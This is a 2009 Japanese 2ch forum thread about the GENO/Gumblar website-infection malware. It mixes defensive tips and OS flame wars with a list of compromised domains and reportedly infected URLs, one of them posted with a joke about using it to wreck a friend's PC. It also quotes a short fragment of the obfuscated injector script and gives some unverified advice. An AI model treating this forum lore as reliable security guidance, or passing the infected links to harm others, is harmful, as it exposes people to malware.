5.全ブラウザでjavascript・activeXの実行不可

で、大丈夫だよな
あとは明日Gumblar 関連のIPブロック設定して、VMでUbuntu入れて終了
寝る。寝るったら寝る。
866 ウイキョウ(長屋):2009/05/18(月) 01:13:49.32 ID:kNM8ic4m
ママンにMacbookでも買ってやるか
867 スカシタゴボウ(東日本):2009/05/18(月) 01:14:58.71 ID:YQEavO2e
>>864
あーっw
868 オキザリス(福島県):2009/05/18(月) 01:15:17.94 ID:lYfnl3+M
UACって何?
869 ビオラ(宮城県):2009/05/18(月) 01:17:51.24 ID:nQjoclSR
>>868
自称情強チェッカー
870 オンシジューム(千葉県):2009/05/18(月) 01:19:17.79 ID:rvMjgXyT
携帯がハイテクになればなるほど
感染力と症状が尋常じゃないウイルスが
いずれ携帯にも現れるんだろうなと思うと怖いですね
871 オーブリ・エチア(関西地方):2009/05/18(月) 01:19:57.43 ID:vSsWPjJy
GENOCIDEウィルス?
872 シラン(東海):2009/05/18(月) 01:20:47.01 ID:CM/0J2La
これってmeたんでも感染すんの?
873 オウレン(千葉県):2009/05/18(月) 01:21:21.55 ID:SRX0kDEN
このサイトってGENOウィルスに感染してるの?
http://www.nifty.com/
874 ニガナ(東京都):2009/05/18(月) 01:21:35.08 ID:zpP0Syph
>>873
してない
875 ポピー(コネチカット州):2009/05/18(月) 01:22:25.39 ID:hBFhb07P
亜種の話広めとかないとヤバくないか?
つか止められなくないかコレ
876 シンフィアンドラ・ザンゼグラ(空):2009/05/18(月) 01:22:45.69 ID:FVcv4/Nr
>>872
多分寝込む
877 ダリア(栃木県):2009/05/18(月) 01:23:07.54 ID:7EQSi5LN
878 オウレン(千葉県):2009/05/18(月) 01:24:53.65 ID:SRX0kDEN
>>874
ニフティって感染してるって書き込みみたけど
デマかw
879 オウバイ(岩手県):2009/05/18(月) 01:25:00.40 ID:Qm4ljfcC
>>877
煽りたい気分は分かるが余計なURLは張るな
880 ウイキョウ(長屋):2009/05/18(月) 01:26:02.73 ID:kNM8ic4m
>878

>115嫁
881 ショウジョウバカマ(和歌山県):2009/05/18(月) 01:27:03.14 ID:YzqxMqo2
こっちのウィルスも怖いが
大阪に通勤してるからインフルもこえーな
882 スズメノヤリ(富山県):2009/05/18(月) 01:28:43.97 ID:5lHI9U8y
Vista の UAC (ユーザーアカウント制御)
Java スクリプトやactive Xなどを実行しようとすると
「あなたの許可が必要です」と警告してくる) が有効であれば、
(不用意に 「続行」 ボタン押さなければ) 感染しにくい

GENOウイルス

Temporary フォルダにウィルス本体 (Java スクリプト) をダウンロードし、
Adobe Reader や Flash Player のバッファオーバーフローの脆弱性を利用して
当該スクリプトを実行することにより、ウィルスに感染させるらしい。
883 キュウリグサ(東京都):2009/05/18(月) 01:30:51.66 ID:CE4W0X3a
バッファオーバーランとはすごいな
しかし、comodo memory firewallを入れている俺に死角はなかった
884 オウレン(千葉県):2009/05/18(月) 01:31:48.24 ID:SRX0kDEN
http://www.nifty.com/
自体は感染していないが、似たようなサイトがあるんだなw
885 チドリソウ(dion軍):2009/05/18(月) 01:32:46.40 ID:fFtL8VLz
>>877
今晩のカレーが不味かったから、明日からはウンコを食えって言われてもなあw
886 ムラサキサギゴケ(東日本):2009/05/18(月) 01:32:47.43 ID:zeXJv1Lw
通ぶってわざわざXPにダウングレードした素人に正義の鉄鎚wwww
887 ダリア(catv?):2009/05/18(月) 01:32:57.89 ID:lAeHMeor
888 タンポポ(大阪府):2009/05/18(月) 01:33:12.77 ID:2xGikqCb
>877
%で区切られた2桁の16進数っぽいのは検索に使ったキーワードかな?

その辺は削っても商品画面にリンクは張れると思うんでテスト
ttp://www.amazon.co.jp/dp/B0016704AW
889 スズメノヤリ(dion軍):2009/05/18(月) 01:34:45.03 ID:VRI3isq0
>>886
わざわざXPにダウングレードしたような情強はAdobeのアップデートもしてるだろw
そういう事も判らないからVista厨は情弱って言われるんだよwww
890 ベニバナヤマボウシ(愛知県):2009/05/18(月) 01:35:26.92 ID:KDXVmLZ3
>>38
何かこれ貼りまくってる人がいるんだけど
891 アッツザクラ(大阪府):2009/05/18(月) 01:35:41.75 ID:+CL0K4hO
>>886
あれはマジで情弱というかなんかの意地だろうなw
microsoftと闘ってるという自意識でもあんのかな
892 スズメノヤリ(不明なsoftbank):2009/05/18(月) 01:35:47.92 ID:g0rWbT+i
>>886
わざわざセキュリティの高いVISTAを蹴ってXP(笑)にダウングレードする企業もたいしたもんだよな
893 カタクリ(大阪府):2009/05/18(月) 01:35:47.97 ID:TDSYE9RX
Vistaカス今までの雪辱を晴らそうと必死で大暴れ(笑)
894 ビオラ(宮城県):2009/05/18(月) 01:35:50.75 ID:nQjoclSR
最低の情弱はVista買った上に管理者権限常用でUAC切ってる奴
895 シラネアオイ(コネチカット州):2009/05/18(月) 01:35:50.32 ID:RhxFgQt9
もしかしてルータの電源をひっこ抜いとけば感染しないんじゃね?
896 ハンショウヅル(埼玉県):2009/05/18(月) 01:35:52.47 ID:YrOwqxtO
win使ってるくせに負け組ざまあwwwwwwwwwwww
897 スズメノヤリ(関西地方):2009/05/18(月) 01:36:53.69 ID:ZPzpcvwA
対策無しで安全なVista
かたや穴だらけのゴミカスOS Xp
898 タンポポ(大阪府):2009/05/18(月) 01:37:31.96 ID:2xGikqCb
アマゾンのアドレスがなんで長くなるのか情強の人の解説希望

E3と83が大杉だけどなんの意味あるんだ?
899 西洋オダマキ(大阪府):2009/05/18(月) 01:38:05.17 ID:ixqcgy1o
つまり
VISTA=情弱専用
900 ケンタウレア・モンタナ(福岡県):2009/05/18(月) 01:38:19.23 ID:Rd0s9LV8
>>895
ビクッ

いちいち確認出てくるの面倒なんだもん
901 イワザクラ(神奈川県):2009/05/18(月) 01:38:22.67 ID:8XdvOuXp
>>894
どこの俺だよ
902 水芭蕉(dion軍):2009/05/18(月) 01:39:35.38 ID:ayChtY8G BE:966917838-BRZ(10006)

どうでもいいが今日教習所での応急救護のとき
心臓マッサージする人形が俺と同じユニクロの服きててきまずかった。
903 ラフレシア(大阪府):2009/05/18(月) 01:40:20.77 ID:RcVtYHrR
【新インフル】国内感染者、すでに1千人規模か・・・★2
http://tsushima.2ch.net/test/read.cgi/news/1242575410/728

728 名前: 水芭蕉(dion軍)[] 投稿日:2009/05/18(月) 01:36:38.14 ID:ayChtY8G ?BRZ(10006)
http://img.2ch.net/ico/gikog_gomibako4.gif
どうでもいいが今日教習所での応急救護のとき
心臓マッサージする人形が俺と同じユニクロの服きててきまずかった。


904 ビオラ(宮城県):2009/05/18(月) 01:41:31.58 ID:nQjoclSR
>>898
アマの中のリンクは全部
http://www.amazon.co.jp/商品名/dq/商品コード/参照パラメータ
の形式になってるから

%E3とか%83はそのままだとURLに含むことが出来ない文字をURLに含むための処理
905 スズメノヤリ(千葉県):2009/05/18(月) 01:46:47.95 ID:9aJIFlRP
XPで仮想PCの中のうぶんちゅからこのスレに書き込んでる俺から見たらかなり笑えるよこのスレ
906 トキワヒメハギミツバアケビ(アラバマ州):2009/05/18(月) 01:46:53.11 ID:ff/Zud9j
リカバリ大変だったから感染したくないでもう
さっさと駆除できるようにしてくれ あとadobeはくそ過ぎる
907 ポピー(沖縄県):2009/05/18(月) 01:47:07.14 ID:1J5FqSJB
>>902
ちんこは相変わらずかわいいなぁv
908 福寿草(東京都):2009/05/18(月) 01:48:57.92 ID:hFA2hoOy
>>905
うぶんちゅってlinux系だっけ?うろおぼえw
linuxの練習台くらいには使えるんだろうか、とか妄想
909 シンビジューム(東海):2009/05/18(月) 01:49:16.96 ID:4kLLEuqo
>>905
ビビりまくりじゃねえかw
910 ケンタウレア・モンタナ(福岡県):2009/05/18(月) 01:50:09.82 ID:Rd0s9LV8
628 名前:名無しさん@明日があるさ[] 投稿日:2009/05/18(月) 01:24:17 O
どうでもいいが今日教習所での応急救護のとき
心臓マッサージする人形が俺と同じユニクロの服きててきまずかった。
911 アッツザクラ(大阪府):2009/05/18(月) 01:50:14.31 ID:+CL0K4hO
自称情強さんはwin自動更新とかUAC切っちゃったりする割に
アンチウイルスソフトにだけは拘ってantivirとか入れてたりするのから困る
912 プリムラ・インボルクラータ(千葉県):2009/05/18(月) 01:50:36.22 ID:DD4Zgjte
うんこつぶ♪
913 タンポポ(大阪府):2009/05/18(月) 01:52:49.61 ID:2xGikqCb
>904
つ 良解答20ポイント
914 スズメノヤリ(静岡県):2009/05/18(月) 01:55:50.04 ID:II7qfJLl
ノートン先生をうpでーとしとけばおk?
915 ムラサキサギゴケ(東日本):2009/05/18(月) 01:56:17.38 ID:zeXJv1Lw
ウイルスにやられたXP厨の悲鳴が心地よいww
916 イヌノフグリ(アラバマ州):2009/05/18(月) 01:57:09.88 ID:Za2w/yhp
175 名前:以下、名無しにかわりましてVIPがお送りします[sage] 投稿日:2009/05/18(月) 01:56:07.26 ID:Mqh09pCS0
http://www.dotup.org/uploda/www.dotup.org39118.jpg

\(^o^)/
917 ガーベラ(大阪府):2009/05/18(月) 01:58:24.09 ID:8Dk4dMgE
>>914
テスト機で調べてみたけど無理っぽい。
なんかやっかいなウイルスですな。
918 フリージア(東京都):2009/05/18(月) 01:58:53.06 ID:xLsEGnPf
 ⊂( ゚д゚ ) ゲ゙ホッゲノホッ
   ヽ ⊂ )
   (⌒)| ダッ
   三 `J

/  O | ̄| O  ヽ
|    / |     | ゲノッゲノGッホ
ヽ、.  ├ー┤    ノ ゲホホッGENOッ
919 ユキヤナギ(関東地方):2009/05/18(月) 01:59:06.59 ID:F8x6RTx3
>>916
jpgでも恐くて踏めぬ
920 姫カンムリシャジン(石川県):2009/05/18(月) 01:59:06.90 ID:DSuVx5x2
XPの悲鳴で今日も飯がウマい!
921 ねこやなぎ(神奈川県):2009/05/18(月) 01:59:11.68 ID:hkZslchY
みんなもうふつうにネトサフィしてるの?
922 ヒヨクヒバ(東京都):2009/05/18(月) 01:59:40.96 ID:bCpcIx63
いまからオナニーしようと思うんだけど
有名所エロサイトでやばいところってどこ?
923 ビオラ(宮城県):2009/05/18(月) 01:59:59.65 ID:nQjoclSR
>>919
例のchmが改竄食らってる画像w
924 オオヤマオダマキ(千葉県):2009/05/18(月) 02:00:02.16 ID:7zP6/DJU
vista土壇場の大逆転で
またもや俺らν速民大勝利だな
925 ムラサキサギゴケ(神奈川県):2009/05/18(月) 02:00:53.73 ID:O+FM/sMT
>>898
/dqより前の部分を削っても同じ内容が表示される
コピペするときはそっちを使うほうがいい
926 カタクリ(大阪府):2009/05/18(月) 02:01:30.33 ID:TDSYE9RX
Vistaカス今までの雪辱を晴らそうと必死で大暴れ(笑)
927 ダリア(catv?):2009/05/18(月) 02:01:37.82 ID:lAeHMeor
afi2000\.web\.fc2\.com
crestronjapan\.com
expss\.main\.jp/expss2/2005/01
geno\.co\.jp
geno-web\.jp
hobbycomplex\.com
joyjoynet\.com
juicyrock\.co\.jp
k-q-bury\.com
livmail\.com
mag-puppine\.com
naxos\.co\.jp
nifty-hair\.com
odn\.ne\.jp/revue1999
p-frying\.com
rakuten.ne.jp/gold/i-na
skyhighpremium\.com
sound.jp/yudai_marimba
thesis-report\.com
ti-a-ra\.com
zengozen\.co\.jp

これ以外の感染URLの一覧載ってるサイトとかしらない?
NGExに入れときたいんだけど
928 マンサク(福岡県):2009/05/18(月) 02:01:38.40 ID:rvdV8qI3
なになに
ここに来てvistaが大勝利したのか
929 ノウルシ(アラバマ州):2009/05/18(月) 02:01:49.87 ID:JsCePAFB
>>921
しない
俺は臆病だから今日までこの戦場で生き残ってこられた
930 タンポポ(大阪府):2009/05/18(月) 02:02:39.44 ID:2xGikqCb
>925
お前も良い奴だな 宝くじ4等ぐらい当たると思うよ
931 藤(東京都):2009/05/18(月) 02:03:58.08 ID:wm9wbCe2
Linuxでよかった
932 タンポポ(大阪府):2009/05/18(月) 02:04:43.58 ID:2xGikqCb
>927
無修正DVDの大手っぽいところが感染してるなw 被害者多そうだ

\(^o^)/
933 ムラサキサギゴケ(東日本):2009/05/18(月) 02:05:03.95 ID:zeXJv1Lw
XP厨(笑)もっと喚け
上から見下ろす地獄絵図は爽快だ
934 オオバクロモジ(ネブラスカ州):2009/05/18(月) 02:05:27.95 ID:LZD5HDvb
avastのクイックスキャンしてたらブルースクリーンなったんだがwwwwwwww
935 シロイヌナズナ(山陽):2009/05/18(月) 02:06:00.03 ID:3ce4apUQ
N速菌が伝染るから寄ってくんなよおまえら
936 カキドオシ(岡山県):2009/05/18(月) 02:06:11.17 ID:wu2fVTfQ
>>921
vistaならリボンマジック見に行っても成美堂見に行っても全然へーきだった

νista大勝利!
937 オキザリス(福島県):2009/05/18(月) 02:06:22.60 ID:lYfnl3+M
FC2感染してるってことはFC2会員全滅ってこと?
938 ボケ(アラバマ州):2009/05/18(月) 02:06:36.41 ID:wHiZnnTH
いや、これ、『何処のサイトが感染してるか分からない』ってのは怖いねえ
XPで自動通知もないアドベの更新してなければ、サイトを開いた瞬間アウトってww

ところで、本当にアドベ経由だけかぁ?
939 ダリア(栃木県):2009/05/18(月) 02:06:56.47 ID:7EQSi5LN
ごしゅじんさま、いままで、とてもたのしかたです。

よくういるすにかんせんしてしておこられたけど、やくにたたなで、ごめんなさい。

ごしゅじんさまが、いれるよていの、びすたはあたしのいもおとです。

いもおとだけど、あたしみたいに、やくたたずではありません。

すなおなこで、からだもじょうぶです。

すたいるもいいから、ほんとはちょっと、くやしいです、

いもとを、かわいがってもらえると。おねえさんとして、うれしいです。

いままでつかえないこで、・ごめんなさい..

そして、つかってくれて、ありがとおゴザいました。

あたしは、もう、きえちゃうけれど¥、さいごに、おねがいがあります。きいてくれると、うれしいです。

ごしゅじんさまの、もっている、えくすぴーのディすく、すてないでください。

あたしが、はいっています。いまのあたしじゃ、ないけど、あたしです。

どきどきみたり、さわったり。、してくれるとうれしいです。

ごしゅじんさまにあえて、えむいは、

しあわS
940 タツタソウ(静岡県):2009/05/18(月) 02:07:53.63 ID:eEziWn+k
Linuxって難しいんだろ?
タダなんだっけ
941 ハルジオン(アラバマ州):2009/05/18(月) 02:07:57.04 ID:dhik7aiB
vista大勝利もなにも元から叩いてたのって低スペックの嫉妬に踊らされてた情弱だけじゃないか
942 プリムラ・ダリアリカ(アラバマ州):2009/05/18(月) 02:08:19.54 ID:xQDS4Dx+
未だにMeなんて使ってる奴は病気としか思えん。
943 ノゲシ(岐阜県):2009/05/18(月) 02:08:32.00 ID:8YQ+U58m
Windows Updateにアクセスできねえ

\(^o^)/
944 デルフィニム(神奈川県):2009/05/18(月) 02:08:44.68 ID:X5s/t7/S
945 ハボタン(奈良県):2009/05/18(月) 02:09:25.92 ID:efBboyxK
スレタイ半角やめろよ。検索引っかからないだろ
946 ヒヨクヒバ(東京都):2009/05/18(月) 02:09:29.33 ID:bCpcIx63
yourfilehostもアウトじゃどうしようもねーわ
947 カキドオシ(岡山県):2009/05/18(月) 02:09:54.25 ID:wu2fVTfQ
948 アッツザクラ(三重県):2009/05/18(月) 02:10:10.43 ID:89xvqA4/
98SEなので大丈夫です
949 シキミ(大阪府):2009/05/18(月) 02:13:17.13 ID:LtTyq7cf
数日前からえらい重かったのはこれだったのか??
やばい。つかねる。
950 藤(東京都):2009/05/18(月) 02:13:20.44 ID:wm9wbCe2
>>940
難しいけど、触らなきゃ始まらないと思う。
951 サポナリア(アラバマ州):2009/05/18(月) 02:13:39.45 ID:XJc8zKFM
239 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2009/05/18(月) 02:12:44.09 ID:mr3CIm+w0
バガボンドで武蔵に興味持って五輪の書読もうと思ったらコレだよ糞が

tp://www.geocities.jp/themusasi2/
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
952 シキミ(大阪府):2009/05/18(月) 02:14:50.83 ID:LtTyq7cf
ていうかC:¥windowsがない…??
953 ビオラ(宮城県):2009/05/18(月) 02:15:33.59 ID:nQjoclSR
>>951
>replace(QW73,xzGAd);var vaCRk=unescape(z2oY);eval(vaCRk)})(/\~/g)

ああ、ありますね確かに
954 サルトリイバラ(dion軍):2009/05/18(月) 02:20:29.18 ID:ktcMUfKS
avast入れて
アドビのリーダーとフラッシュ最新にした
これでOK?
955 サポナリア(福島県):2009/05/18(月) 02:20:55.00 ID:UvvrOPvK
>>951
普通に開いてしまったw
956 スズメノヤリ(東京都):2009/05/18(月) 02:21:26.28 ID:s+nyZ3fG
>>954
とりあえずはそれでおk
957 オキザリス(福島県):2009/05/18(月) 02:22:36.14 ID:lYfnl3+M
>>955
それってやばいんじゃ
958 オオジシバリ(チリ):2009/05/18(月) 02:23:25.56 ID:l+oX7WDr
XPで擬似UAC環境構築できた!これで勝つる!
959 ビオラ(宮城県):2009/05/18(月) 02:24:05.20 ID:nQjoclSR
>>957
js切ってりゃ何の問題もない
今はね
960 キエビネ(大阪府):2009/05/18(月) 02:24:52.48 ID:GU8ASW3z
http://azcji.cocolog-nifty.com/blog/cat1459704/index.html
危険度1000%
超絶危険なURLです。友人の古いPCをフリーズさせるのに利用しましょう!
絶対に踏んではいけません。
961 ハボタン(奈良県):2009/05/18(月) 02:25:43.81 ID:efBboyxK
  _____
 |\ ◎-----、\     人人人人人人人人人人人人人人人人人人人人人人人人人人人人人
 |  \丶-----ヽ\ < すごい一斗缶を感じる。今までにない何か便利な一斗缶を。       >
 |   | ̄ ̄ ̄ ̄|< 形状・・・なんだろう定められている日本工業規格(JIS規格)に。      >
 | //|  \ / | < 天板、地板は一辺の長さが238.0±2.0mm、高さは349.0±2.0mm、   >
 |   | (゚)=(゚) |< 質量は1140±60g、容量は19.25±0.45リットルと定められている。    >
 |   |  ●_● |< 規格の大元は、一斗=十升(約18.039リットル)を基準に考案されている。>
 |   |        | < 5ガロン缶とも呼ばれていた時期もある。(1ガロン = 3.7854118リットル) >
 \  | 〃----ヾ | < 5ガロンと18リットルで、5月18日は18リットル缶の日だよ。         >
   \|____|  YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY
962 トウゴクシソバタツナミ(鳥取県):2009/05/18(月) 02:26:07.68 ID:K0VF4NPH
>>960
404ぽいけど
963 スカシタゴボウ(東日本):2009/05/18(月) 02:26:16.41 ID:YQEavO2e
adobe readerのjavascriptきったぉ
964 オキザリス(福島県):2009/05/18(月) 02:26:24.10 ID:lYfnl3+M
vistaだしJava切ってるけど怖くて眠れない
965 ビオラ(宮城県):2009/05/18(月) 02:26:31.05 ID:nQjoclSR
>>960
いつでもレタスじゃんww
966 ポピー(コネチカット州):2009/05/18(月) 02:26:33.09 ID:2pqWC4Se
やったー感染してたよー

\(^o^)/
Pen4のせいでリカバリ出来ん
967 サポナリア(福島県):2009/05/18(月) 02:27:00.99 ID:UvvrOPvK
>>957
XPだけどアドビ系最新だしノースクリプト入れてるし大丈夫
ノースクリプトは間違ってブラクラ開いちゃった時とかにも効力発揮するし便利
968 ダリア(栃木県):2009/05/18(月) 02:29:25.28 ID:7EQSi5LN
>>960
Vistaで余裕です(^^)

いつでもレタス
常識を覆す栽培方法方法で、四季を通して栽培出来ます、室内の栽培にも対応します。
土を使わないで清潔、早期、多収穫が期待出来ます、冬のレタス栽培は得意とします。
969 サポナリア(福島県):2009/05/18(月) 02:31:08.16 ID:UvvrOPvK
>>966
どんな症状出た?
970 バラ(東日本):2009/05/18(月) 02:32:52.07 ID:ZKzGqHKR
>>5
こ これは
971 ヤエザクラ(関西地方):2009/05/18(月) 02:34:59.99 ID:W8ANipOH
GENOウイルスチェッカー(まとめも充実)
ttp://geno.2ch.tc/

Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに http://geno.2ch.tc/index.php?url=$TEXT$LINK
ってやるとなぞり検索でチェックできる

GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/

GENOウイルススレ ★13
http://pc11.2ch.net/test/read.cgi/sec/1242576033/

【管理も】同人サイト・GENOウィルス注意7【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242565127/

【Genoウィルス総合スレ】ニフティのオンラインウィルスチェックをする→感染
http://namidame.2ch.net/test/read.cgi/poverty/1242359071/

【ネット】 小林製薬ウェブサイトの一部でサイト改ざん、現在は閉鎖  閲覧者にはウイルス感染の恐れ [09/05/12]
http://anchorage.2ch.net/test/read.cgi/bizplus/1242271601/


前スレ
【ネットでも】GENOウィルス亜種が爆発的に増殖か 小林製薬や同人サイト他中心に感染も★5【新型ウィルス拡散中】
http://tsushima.2ch.net/test/read.cgi/news/1242555395/
972 ハンショウヅル(千葉県):2009/05/18(月) 02:35:46.07 ID:a+VWNFBP
>>960
危険度209パーセント
973 オランダミミナグサ(神奈川県):2009/05/18(月) 02:36:25.86 ID:Hbuxqfsh
プニルやIEでもjavascript+ActiveXをoffっときゃ無問題でしょ?
974 スズメノヤリ(dion軍):2009/05/18(月) 02:36:32.78 ID:VRI3isq0
>>960
危険度209%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。

まあ、レタスの人はPCとかネット苦手だけど必死になんとかやってるって感じだもんなw
いつ改竄されててもおかしくないレベル。
975 ダリア(栃木県):2009/05/18(月) 02:36:50.41 ID:7EQSi5LN
_________       / ̄ ̄ ̄\      __________
\   なら   /      ./  あなたのi,     ヽ リカバリディスクは /
  \ 安心だ!/   n     | PCは感染 |  y    \   作ってある?/ 
   \   / <―――― .'i,している? /─┐      \      /
     \/            \___/  └──>  \    /
                               .       \/
                                   /  |
                                  /y   .|
                  _________  |/ .     |
                  \さっさとリカバリ/   ̄   .  |
                    \  しろ   /           | n
                     \   /      .        |
                       \/            ヽ|/     
                            / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
                            | GENOウィルスと共に  |
                            |   過ごすPCライフ   |  
                   priceless / \_________/
                        /         |
                      |/       .     | 旦那に新しいPCを買ってもらう
                       ̄           ヽ|/    
            / ̄ ̄ ̄ ̄ ̄ ̄\   .  | ̄ ̄ ̄ ̄ ̄ ̄ ̄\  
             |  VIPでやれ  |     |  鬼女でやれ  |      
            \______/     .|_______/    
976 サルトリイバラ(dion軍):2009/05/18(月) 02:38:31.71 ID:ktcMUfKS
フリーソフトでOSイメージをDVDに焼けるようなソフトないですかね
977 ビオラ(宮城県):2009/05/18(月) 02:40:50.73 ID:nQjoclSR
ソフトウェア板行け
978 ポピー(コネチカット州):2009/05/18(月) 02:42:43.55 ID:2pqWC4Se
>>969
まとめどうり
osが不安定になったりはしてない
意味ないけどWindowsアップデートは出来た
979 オオジシバリ(ネブラスカ州):2009/05/18(月) 02:43:59.58 ID:lE6nGr7Z
やっと削除出来た
980 ビオラ(宮城県):2009/05/18(月) 02:44:35.74 ID:nQjoclSR
>>976
本当にソフトウェア板に質問しに行ったろw
981 シラー・カンパヌラータ(コネチカット州):2009/05/18(月) 02:44:50.79 ID:6B4OT9am
>>943
なんかのマルウェアにやられてるな
間違いなく
982 ポピー(福井県):2009/05/18(月) 02:45:07.66 ID:WzowJXhW
ν速公認ベンチマークサイトまでもがw
983 ジギタリス(dion軍):2009/05/18(月) 02:48:10.47 ID:BNJP1b0S
XP厨の悲鳴でメシが旨い
984 シラー・カンパヌラータ(コネチカット州):2009/05/18(月) 02:48:27.44 ID:6B4OT9am
軽いかどうかだけでOS選んでたニュー速民w
たいしたことねーな
985 サルトリイバラ(dion軍):2009/05/18(月) 02:53:29.24 ID:ktcMUfKS
>>980
はいw
986 シラン(愛知県):2009/05/18(月) 02:55:49.83 ID:w1ZOyuPV
今日にはニコニコのサイトが感染とかになったりして
987 モモイロヒルザツキミソウ(香川県):2009/05/18(月) 02:56:08.02 ID:TACx4C8/
>>1
>javascript切っていても感染のするとの事

ウソクソ情報
■javascriptを切ってても感染する(5/17現在)
  今の時点ではウソだが将来的に、pdf or swfをjavascript経由せずに直接読み込ませるタイプのものが出てきたらアウト
  とにかく↓のアドビ関連のアップデートを怠らないこと。
988 アブラチャン(静岡県):2009/05/18(月) 02:56:50.28 ID:iqYqaMgK
os             Vista
サイズ    49.5 KB (50,727 バイト)
ディスク上   52.0 KB (53,248 バイト)
作成日時  2006年11月3日0:55:20
更新日時  2006年11月3日0:55:20

今から電源切って寝る
989 ツメクサ(長屋):2009/05/18(月) 02:57:39.01 ID:Do+/LFsa
vistaもやばい亜種が出たってマジ?
990 スズメノヤリ(アラバマ州):2009/05/18(月) 02:59:38.95 ID:I/PUO3jg
aviraとavast一緒に使ってみてるんだがavastのアンチウイルスやるとavira先生が大激怒するんだがww
991 サポナリア(福島県):2009/05/18(月) 03:01:01.94 ID:UvvrOPvK
>>978
情報さんくす
感染確かめる方法はまとめので確かなんだね
992 ダリア(栃木県):2009/05/18(月) 03:05:33.98 ID:7EQSi5LN
>>986
涙目動画に名前変えないといけなくなるな
993 バーベナ(アラバマ州):2009/05/18(月) 03:08:24.19 ID:kMRLQtHY
マイコンで右クリすると7割くらいの確立で固まる
スペックが低いわけじゃないのに
994 サポナリア(アラバマ州):2009/05/18(月) 03:09:56.91 ID:XJc8zKFM
>>993感染してたら感染した心当たりのサイト報告

4 名前:以下、名無しにかわりましてVIPがお送りします[] 投稿日:2009/05/18(月) 01:01:39.74 ID:GoatvS/D0
感染チェックツール(暫定最終)
ttp://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認→このツールが起動しない場合はcmd.exeが壊れています
2 ) regedit.exeの起動確認(任意)→UACが出る場合は許可して、起動するのを見届けてください。起動しなければ壊れてます。
3 ) sqlsodbc.chmのファイルサイズ確認→結果がレポートされます。

不安ならテキストエディタで開いてソース読んでから実行してちょうだい。
2000/XP/Vista+7を自動判別して、それぞれに対応したメニューでsqlsodbc.chmを探して
ファイルサイズが正常かどうかチェックします。

めんどくさいから自分のとこに置くようにした。以後は最新版が常にこのURLから取れるようにしておきます。
dotup+番号だと偽物と区別がつきにくいのと、いちいちURL直すのが煩雑で伝わりづらいからです。
batは鯖の設定で置けないんでzipで固めてあります。必要に応じてreadme.txtなんかを追加するかも知れません。
あと万が一私が感染していたとしても、これはHTMLでないのでGENOのコードは埋め込まれません。
995 チドリソウ(dion軍):2009/05/18(月) 03:11:15.43 ID:fFtL8VLz
>>993
マイコンならメモリ1MBとかか?
そりゃ灰スペックだw
996 コデマリ(dion軍):2009/05/18(月) 03:13:33.95 ID:5jeJHd9R
>>990
どっちか一方にしないとごねるよ。
997 バーベナ(アラバマ州):2009/05/18(月) 03:13:38.53 ID:kMRLQtHY
マイコンというよりexplorer関係だわ
デスクトップやタスクトレイでも固まる
998 オオイヌノフグリ(東京都):2009/05/18(月) 03:15:29.80 ID:g5vCwtCZ
999 オオイヌノフグリ(東京都):2009/05/18(月) 03:16:16.08 ID:g5vCwtCZ
1000 ムラサキサギゴケ(東日本):2009/05/18(月) 03:16:17.95 ID:zeXJv1Lw
1000ならXP厨完全敗北
10011001
このスレッドは1000を超えました。
もう書けないので、新しい職を探して下さい。。。

                            ニュース速報
              http://www.hellowork.go.jp/